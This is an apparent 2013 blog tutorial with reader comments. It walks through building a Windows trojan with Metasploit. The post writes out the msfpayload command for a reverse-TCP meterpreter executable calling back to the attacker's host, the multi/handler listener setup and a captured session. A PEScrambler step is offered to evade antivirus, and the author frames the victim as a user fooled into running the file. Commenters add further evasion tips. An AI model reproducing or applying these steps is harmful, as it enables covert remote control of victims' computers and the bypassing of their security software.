Make a trojan/backdoor for windows xp/7 using metasploit

Metasploit can be used to make simple yet powerful trojans for windows that can allow a hacker complete access and control over the target system. In this article we shall see how to use metasploit to make a trojan and hack a windows system using it.

You shall need a system running metasploit and another system running windows where you can get a file to run. For the experiment we are running metasploit on a backtrack system and windows xp inside virtualbox.

Payload with msfpayload

The msfpayload command is used to generate a variety of payloads for different target systems. If you do not already know, then, a payload is a piece of code that does a very SPECIFIC task on a system as intended by the hacker. For example open a reverse shell or run a vnc program etc. When running an remote exploit for example, you always want to run a payload as well so that the system can come under your control.

However this example is a client side attack and not a remote exploit. We make the target user run a program a bad program by fooling him somehow. So here there is no exploit code involved, just the payload. Since the target user acts as the exploit already.

Ok, so lets start with the msfpayload command and see what can be done.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe

The above command creates a meterpreter payload for windows that uses a reverse tcp connection. Other important parameters mentioned are LHOST ( for local host ip address ) and LPORT (local host port number). The LHOST ip must be the ip address of the hacker's machine that is running metasploit. The ip address and the port number must be reachable from the target machine. Since in reverse tcp, the victim initiates a connection to the hacker machine.

Once the command finishes a file called trojan.exe would be created in the Desktop directory of the current user. Here is the complete output of the command

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.4", "LPORT"=>"6666"}
Quick Tip : To list all available payloads use "msfpayload -l"

Now this file "trojan.exe" is supposed to run on the victim machine. But not yet. First we have to start a listener on the hacker machine so that it can receive incoming connections from the trojan. To do this enter the msfconsole.







msf > use exploit/multi/handler

We now use exploit/multi/handler. This will receive the incoming connection from trojan.exe and open a meterpreter session. Before running the exploit some options need to be setup.

msf  exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf  exploit(handler) > set LPORT 6666
LPORT => 6666
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666 
[*] Starting the payload handler...

Now run the trojan.exe on the windows machine. And the msfconsole would give the meterpreter session as soon as connected.

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6666 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.4:6666 -> 192.168.1.101:44238) at 2013-03-04 11:12:41 +0530

meterpreter >

Now that we have meterpreter, anything can be done on the target system.

Handling antivirus - make the trojan undetectable

The trojan created in the above example would run fine on windows xp and 7 if there are no uptodate antivirus on them. If there are any antivirus on the system they would detect the payload signature and warn the user. Windows 8 on the other hand comes with inbuilt anti malware protection (Windows defender) which would detect the trojan right away and would not allow the user to run the program.

So we need a way around this to make the trojan undetectable. A utility called PEScrambler can be used to encode the executable file such that antivirus/anti malware cannot detect it. Check it out at

https://code.google.com/p/pescrambler/

The download contains a single executable file and the usage is straightforward

C:\>PEScrambler.exe -i trojan.exe -o encoded.exe

Now the encoded.exe file is different from trojan.exe and is encoded such that antivirus may not be able to detect it.

At this point of time, most antivirus and antimalwares have become fully aware of the above techniques and it would be very difficult for the trojan to go undetected. Windows 8 inbuilt antimalware detects all such types of payloads generated from msfpayload and encoded with msfencode to whatever iteration level.

Last Updated On : 4th March 2013

Subscribe to get updates delivered to your inbox

6 Comments + Add Comment

  • I think your msfpayload is wrong…. in msfpayload there is no LPORT, LPORT exist in msfvenom

  • 404 PESCRAMBLER not found… Any url to it?

  • tell me the solution plz

  • very good explain but i have a problem man when i started trojan on pc where the backtrack run in vmware player it works but when i run it other my pc it not works and i also turned off avs

  • You can also use code encryption which bypass most AV. A bit more complicated method described in:
    http://www.sevagas.com/?Hide-meterpreter-shellcode-in

  • man this is awesome! thanks

    is there any to make that trojan listen on the compromised machine? i would rather prefer if the compromised machine listening instead we are listening it. Hopefully you can help on this. thanks !

Leave a comment